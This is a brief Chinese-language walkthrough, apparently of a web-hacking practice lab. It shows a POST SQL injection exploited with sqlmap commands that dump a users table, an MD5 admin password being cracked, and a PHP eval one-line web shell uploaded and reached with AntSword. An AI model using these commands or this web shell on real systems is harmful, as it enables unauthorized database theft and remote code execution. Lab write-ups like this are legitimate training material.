1.登录网站首页
2.注册登录
3.单击search
可以发现有很多书
4.尝试sql注入
判断注入点和闭合方式
因为是post传参 我们抓包查看
保存为1.txt文档 然后使用sqlmap工具进行测试
发现此处存在sql注入
查询当前数据库
python sqlmap.py -r C:\Users\17387\Desktop\1.txt --current-db
查表
python sqlmap.py -r C:\Users\17387\Desktop\1.txt -D webapphacking --t
ables
可以看到有两个表
我们查看users表的数据
python sqlmap.py -r C:\Users\17387\Desktop\1.txt -D webapphacking -T users --dump
5.使用管理员账号登录
可以看到密码是被MD5加密的
在线MD5网站进行解密 可以看到密码是Uncrackable
账号superadmin 密码为Uncrackable 登录成功
6.上传一句话木马
<?php @eval($_POST['cmd']); ?>
shell.php上传成功
可以看到我们上传的shell.php文件
7.使用蚁剑进行连接
可以连接成功